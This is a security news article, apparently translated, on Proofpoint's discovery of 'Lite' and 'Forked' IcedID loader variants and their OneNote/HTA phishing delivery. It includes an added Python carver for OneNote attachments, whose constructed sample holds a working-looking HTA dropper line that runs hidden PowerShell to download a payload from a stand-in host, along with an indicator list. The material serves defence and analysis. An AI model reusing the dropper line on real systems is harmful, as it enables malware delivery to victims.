Malicious revolution: IcedID changes tactics and becomes even more dangerous

    Learn about dangerous changes to IcedID and how to protect yourself from new threats.

    Proofpoint recently discovered new variants of the IcedID malware. They lack IcedID's usual online banking fraud features and instead focus on installing additional malware on compromised systems.

    Since the end of last year, the new IcedID variants have reportedly been used by three independent threat actors across seven different campaigns. All of the attacks were aimed at delivering follow-on payloads, most likely ransomware.

    Proofpoint has identified two new variants of the IcedID loader: "Lite" (first seen in November 2022) and "Forked" (first seen in February 2023). Both loaders differ from the older IcedID versions in their functionality and in how the payload is delivered.

    Removing unneeded features from IcedID, which has been used in numerous malware campaigns without significant changes since 2017, makes the malware less conspicuous and more compact, which can help attackers evade detection.

    Starting in November 2022, the "Lite" variant of the IcedID loader was delivered as a second-stage payload after the device had already been infected with another notorious malware, Emotet.

    The "Forked" version of the loader first appeared in February 2023 and was distributed directly through thousands of phishing emails carrying fake tax documents. These attacks used Microsoft OneNote attachments with the ".one" extension. The attachment embedded a malicious ".hta" file; opening it launched PowerShell, which downloaded IcedID itself from a remote resource. The victim saw only a decoy PDF and did not notice the malicious activity running in the background.
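    The OneNote-to-HTA chain described above can be triaged offline by carving the embedded files out of the ".one" attachment before anything is opened. The following is an added example, not code from the original article or from Proofpoint: it walks a OneNote blob for FileDataStoreObject structures (the header GUID and layout are taken from the MS-ONESTORE specification), extracts each embedded file and labels it with simple string indicators. The ".one" blob, the decoy PDF, the HTA body and the URL decoy.invalid are constructed for the example and do not come from any real sample.

```python
import struct
from typing import List, Tuple

# On-disk (little-endian) form of the FileDataStoreObject header GUID
# {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} from the MS-ONESTORE specification.
# Every file embedded in a OneNote .one section is wrapped in this structure:
#   guidHeader (16) | cbLength uint64 (8) | unused (4) | reserved (8) | FileData
FILE_DATA_STORE_GUID = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
HEADER_LEN = 16 + 8 + 4 + 8

# Case-insensitive indicators that a carved object is a script dropper or a
# decoy document. Constructed list for this example; extend it as needed.
INDICATORS = (
    (b"<script", "embedded script (HTA/HTML)"),
    (b"powershell", "PowerShell invocation"),
    (b"invoke-webrequest", "remote download cmdlet"),
    (b"%pdf-", "PDF (possible decoy)"),
)


def carve_embedded_files(blob: bytes) -> List[bytes]:
    """Return the FileData of every FileDataStoreObject found in a .one blob."""
    found: List[bytes] = []
    pos = blob.find(FILE_DATA_STORE_GUID)
    while pos != -1 and pos + HEADER_LEN <= len(blob):
        (length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + HEADER_LEN
        # A malformed cbLength past EOF simply yields a truncated last object.
        found.append(blob[start:start + length])
        pos = blob.find(FILE_DATA_STORE_GUID, start + length)
    return found


def classify(payload: bytes) -> List[str]:
    """Label a carved payload by the indicators it contains."""
    low = payload.lower()
    return [label for needle, label in INDICATORS if needle in low]


def scan_onenote(blob: bytes) -> List[Tuple[int, int, List[str]]]:
    """(index, size, labels) for each embedded object; labels is empty if nothing matched."""
    return [(i, len(p), classify(p)) for i, p in enumerate(carve_embedded_files(blob))]


# --- constructed sample section (not a real IcedID lure) -------------------
def _wrap(payload: bytes) -> bytes:
    """Build a FileDataStoreObject around payload, the way OneNote stores attachments."""
    return FILE_DATA_STORE_GUID + struct.pack("<Q", len(payload)) + b"\x00" * 12 + payload


DECOY_PDF = b"%PDF-1.4\n% constructed decoy page, no real content\n"
HTA_DROPPER = (
    b'<html><head><script language="VBScript">\n'
    b'Set sh = CreateObject("WScript.Shell")\n'
    b'sh.Run "powershell -w hidden -c Invoke-WebRequest http://decoy.invalid/stage -OutFile x.dll", 0\n'
    b"</script></head></html>\n"
)
# Filler bytes stand in for the rest of the OneNote file structure.
SAMPLE_ONE = b"\x00" * 64 + _wrap(DECOY_PDF) + b"\xff" * 32 + _wrap(HTA_DROPPER) + b"\x00" * 16

if __name__ == "__main__":
    for idx, size, labels in scan_onenote(SAMPLE_ONE):
        print(f"object {idx}: {size} bytes -> {labels or ['no indicators']}")
```

    Run against a real attachment, the carver does not depend on the file extension, so it also catches ".one" files renamed to evade a mail filter. The string indicators are deliberately crude; in practice the carved HTA would be handed to a sandbox, and any object whose cbLength runs past the end of the file should be treated as suspicious on its own.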

    In late February, Proofpoint researchers observed a small-scale IcedID "Forked" campaign using emails that spoofed notifications from the US agencies NHTSA and the FDA. As Proofpoint points out, while some attackers are using the new loader variants, others still choose to deploy the "Standard" variant, with one of the latest such campaigns recorded earlier this month.

    The "Forked" IcedID loader is very similar to the "Standard" version in its role: it sends basic host information to the C2 server and then retrieves the IcedID bot itself. However, it is delivered as a different file type and contains additional domain and string decryption code, making it 12 KB larger than the standard version. The "Lite" loader is 20 KB smaller and does not send host information to the C2 server, since it is usually deployed together with Emotet, which already profiles the compromised system.

    The "Forked" version of the IcedID bot itself is 64 KB smaller than the "Standard" bot and is essentially the same malware minus the web injection system, the AiTM (adversary-in-the-middle) functionality, and the backconnect capability that gives attackers remote access to infected devices.

    IcedID is typically used by attackers for initial access to the target device. The development of new variants is a worrying sign, pointing to a shift towards specializing the bot for payload delivery.

    Proofpoint predicts that the majority of attackers will continue to use the "Standard" version of the IcedID loader, but that deployment of the newer versions will also increase, and that more loader variants may appear later this year.

    Author DeepWeb